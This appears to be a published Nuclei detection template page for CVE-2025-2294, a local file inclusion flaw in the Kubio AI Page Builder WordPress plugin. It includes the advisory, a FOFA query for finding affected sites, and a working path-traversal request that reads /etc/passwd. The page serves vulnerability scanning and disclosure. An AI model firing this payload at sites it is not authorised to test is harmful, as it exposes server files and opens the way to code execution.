Skip to content

Kubio AI Page Builder <= 2.5.1 - Local File Inclusion

ID: CVE-2025-2294

Severity: critical

Author: s4e-io

Tags: cve,cve2025,wp,wordpress,wp-plugin,lfi,kubio

The Kubio AI Page Builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.5.1 via thekubio_hybrid_theme_load_template function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.

id: CVE-2025-2294
info:
name: Kubio AI Page Builder <= 2.5.1 - Local File Inclusion
author: s4e-io
severity: critical
description: |
The Kubio AI Page Builder plugin for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 2.5.1 via thekubio_hybrid_theme_load_template function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where images and other “safe” file types can be uploaded and included.
remediation: Fixed in 2.5.2
reference:
- https://github.com/Nxploited/CVE-2025-2294
- https://plugins.trac.wordpress.org/browser/kubio/tags/2.5.1/lib/integrations/third-party-themes/editor-hooks.php#L32
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/kubio/kubio-ai-page-builder-251-unauthenticated-local-file-inclusion
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-2294
cwe-id: CWE-22
epss-score: 0.01247
epss-percentile: 0.77471
metadata:
verified: true
max-request: 2
fofa-query: body="wp-content/plugins/kubio/"
tags: cve,cve2025,wp,wordpress,wp-plugin,lfi,kubio
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body,"/plugins/kubio")'
internal: true
- raw:
- |
GET /?__kubio-site-edit-iframe-preview=1&__kubio-site-edit-iframe-classic-template=../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- regex('root:.*:0:0:', body)
- status_code == 200
condition: and
# digest: 4b0a004830460221008de23d0f17d6aeb619477033bf45366a211f319936fa556dcb57f8b91c9ae08c022100d5bc8f26e060feeaae163a44dd0e1503f821610a4680126c20d0977925c1235c:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2025/CVE-2025-2294.yaml"

View on Github